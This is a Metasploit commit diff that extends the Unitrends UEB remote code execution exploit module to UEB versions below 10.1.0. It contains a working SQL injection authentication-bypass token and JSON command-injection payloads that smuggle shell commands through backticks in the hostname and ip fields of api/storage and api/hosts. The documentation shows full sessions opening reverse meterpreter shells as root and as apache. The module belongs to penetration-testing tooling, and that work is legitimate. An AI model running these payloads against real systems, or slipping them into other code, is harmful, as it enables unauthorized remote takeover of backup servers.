Land #10616, update Unitrends UEB module to support vulnerabilities in version 10

2018-10-05 16:20:38 -05:00 · 2018-10-05 16:20:38 -05:00 · e2f97c75a0
parent 4363bd830b 354803185c
commit e2f97c75a0
3 changed files with 142 additions and 57 deletions
--- a/documentation/modules/exploit/linux/http/ueb9_api_storage.md
+++ b/documentation/modules/exploit/linux/http/ueb9_api_storage.md
@ -1,42 +0,0 @@
-## Vulnerable Application
-
-  Unitrends UEB 9 http api/storage remote root
-
-  This exploit leverages a sqli vulnerability for authentication bypass,
-  together with command injection for subsequent root RCE.
-
-## Verification Steps
-
-  1. ```use exploit/linux/http/ueb9_api_storage ```
-  2. ```set lhost [IP]```
-  3. ```set rhost [IP]```
-  4. ```exploit```
-  5. A meterpreter session should have been opened successfully
-
-## Scenarios
-
-### UEB 9.1 on CentOS 6.5
-
-```
-msf > use exploit/linux/http/ueb9_api_storage
-msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
-rhost => 10.0.0.230
-msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
-lhost => 10.0.0.141
-msf exploit(ueb9_api_storage) > exploit
-
-[*] Started reverse TCP handler on 10.0.0.141:4444
-[*] 10.0.0.230:443 - pwn'ng ueb 9....
-[*] Command Stager progress -  19.83% done (164/827 bytes)
-[*] Command Stager progress -  39.30% done (325/827 bytes)
-[*] Command Stager progress -  57.44% done (475/827 bytes)
-[*] Command Stager progress -  75.45% done (624/827 bytes)
-[*] Command Stager progress -  93.35% done (772/827 bytes)
-[*] Command Stager progress - 110.88% done (917/827 bytes)
-[*] Sending stage (826872 bytes) to 10.0.0.230
-[*] Command Stager progress - 126.72% done (1048/827 bytes)
-[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
-
-meterpreter > getuid
-Server username: uid=0, gid=0, euid=0, egid=0
-```
--- a/documentation/modules/exploit/linux/http/ueb_api_rce.md
+++ b/documentation/modules/exploit/linux/http/ueb_api_rce.md
@ -0,0 +1,93 @@
+## Vulnerable Application
+
+This exploit leverages a sqli vulnerability for authentication bypass,
+together with command injection for subsequent RCE.
+
+This exploit has two targets:
+
+  1. Unitrends UEB 9 http api/storage RCE for root privileges
+  2. Unitrends UEB < 10.1.0 api/hosts RCE for user (apache) privileges
+
+## Verification Steps
+
+  1. ```use exploit/linux/http/ueb_api_rce```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```set target [#]```
+  5. ```exploit```
+  6. A meterpreter session should have been opened successfully
+
+## Scenarios
+
+### UEB 9.2 on CentOS 6.5 Using api/storage (target 0) root exploit
+
+```
+msf5 > use exploit/linux/http/ueb_api_rce 
+msf5 exploit(linux/http/ueb_api_rce) > set target 0
+target => 0
+msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
+rhost => 1.1.1.1
+msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+msf5 exploit(linux/http/ueb_api_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress -  19.76% done (164/830 bytes)
+[*] Command Stager progress -  39.16% done (325/830 bytes)
+[*] Command Stager progress -  56.87% done (472/830 bytes)
+[*] Command Stager progress -  74.82% done (621/830 bytes)
+[*] Command Stager progress -  92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43600) at 2018-09-10 20:51:16 -0400
+
+meterpreter > sysinfo
+Computer     : 1.1.1.1
+OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+### UEB 9.2 on CentOS 6.5 Using api/hosts (target 1) exploit
+
+```
+msf5 > use exploit/linux/http/ueb_api_rce 
+msf5 exploit(linux/http/ueb_api_rce) > set target 1
+target => 1
+msf5 exploit(linux/http/ueb_api_rce) > set rhost 1.1.1.1
+rhost => 1.1.1.1
+msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
+lhost => 2.2.2.2
+msf5 exploit(linux/http/ueb_api_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress -  19.76% done (164/830 bytes)
+[*] Command Stager progress -  39.16% done (325/830 bytes)
+[*] Command Stager progress -  56.87% done (472/830 bytes)
+[*] Command Stager progress -  74.82% done (621/830 bytes)
+[*] Command Stager progress -  92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:43515) at 2018-09-10 20:46:24 -0400
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+
+meterpreter > sysinfo
+Computer     : 1.1.1.1
+OS           : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > getuid
+Server username: uid=48, gid=48, euid=48, egid=48
+meterpreter > shell
+Process 25534 created.
+Channel 1 created.
+whoami
+apache
+```
--- a/modules/exploits/linux/http/ueb9_api_storage.rb
+++ b/modules/exploits/linux/http/ueb9_api_storage.rb
@ -11,18 +11,21 @@ class MetasploitModule < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Unitrends UEB 9 http api/storage remote root',
+      'Name'           => 'Unitrends UEB http api remote code execution',
      'Description'    => %q{
        It was discovered that the api/storage web interface in Unitrends Backup (UB)
        before 10.0.0 has an issue in which one of its input parameters was not validated.
        A remote attacker could use this flaw to bypass authentication and execute arbitrary
        commands with root privilege on the target system.
+        UEB v9 runs the api under root privileges and api/storage is vulnerable.
+        UEB v10 runs the api under limited privileges and api/hosts is vulnerable.
      },
      'Author'         =>
        [
          'Cale Smith',    # @0xC413
          'Benny Husted', # @BennyHusted
-          'Jared Arave'   # @iotennui
+          'Jared Arave',   # @iotennui
+          'h00die'
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
@ -31,14 +34,18 @@ class MetasploitModule < Msf::Exploit::Remote
      'References'     =>
        [
          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006002'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
+          ['URL', 'http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html'],
+          ['EDB', '44297'],
          ['CVE', '2017-12478'],
+          ['CVE', '2018-6328']
        ],
      'Targets'        =>
        [
-          [ 'UEB 9.*', { } ]
+          [ 'UEB 9.*', { 'Privileged' => true} ],
+          [ 'UEB < 10.1.0', { 'Privileged' => false} ]
        ],
-      'Privileged'     => true,
      'DefaultOptions' => {
          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
          'SSL' => true
@ -53,6 +60,28 @@ class MetasploitModule < Msf::Exploit::Remote
    deregister_options('SRVHOST', 'SRVPORT')
  end

+  def auth_token
+    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
+    Base64.strict_encode64(session) #b64 encode session token
+  end
+
+  def check
+    res = send_request_cgi!({
+        'method' => 'GET',
+        'uri'    => '/api/systems/details',
+        'ctype'  => 'application/json',
+        'headers' =>
+        {'AuthToken' => auth_token}
+      })
+    if res && res.code == 200
+      print_good("Good news, looks like a vulnerable version of UEB.")
+      return CheckCode::Appears
+    else
+      print_bad('Host does not appear to be vulnerable.')
+    end
+    return CheckCode::Safe
+  end
+
  #substitue some charactes
  def filter_bad_chars(cmd)
    cmd.gsub!("\\", "\\\\\\")
@ -60,23 +89,27 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def execute_command(cmd, opts = {})
-    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
-    session = Base64.strict_encode64(session) #b64 encode session token
-
-    #substitue the cmd into the hostname parameter
-    parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
-    parms << filter_bad_chars(cmd)
-    parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
-
+    if target.name == 'UEB 9.*'
+      #substitue the cmd into the hostname parameter
+      parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
+      parms << filter_bad_chars(cmd)
+      parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
+      uri = '/api/storage'
+    elsif target.name == 'UEB < 10.1.0'
+      parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&|
+      parms << filter_bad_chars(cmd)
+      parms << %Q|`'"}|
+      uri = '/api/hosts'
+    end

    res = send_request_cgi({
-      'uri' => '/api/storage',
+      'uri' => uri,
      'method' => 'POST',
      'ctype'  => 'application/json',
      'encode_params' => false,
      'data'   => parms,
      'headers' =>
-        {'AuthToken' => session}
+        {'AuthToken' => auth_token}
    })

    if res && res.code != 500
@ -87,7 +120,8 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    print_status("#{peer} - pwn'ng ueb 9....")
+    print_status("#{peer} - Sending requests to UEB...")
    execute_cmdstager(:linemax => 120)
  end
 end
+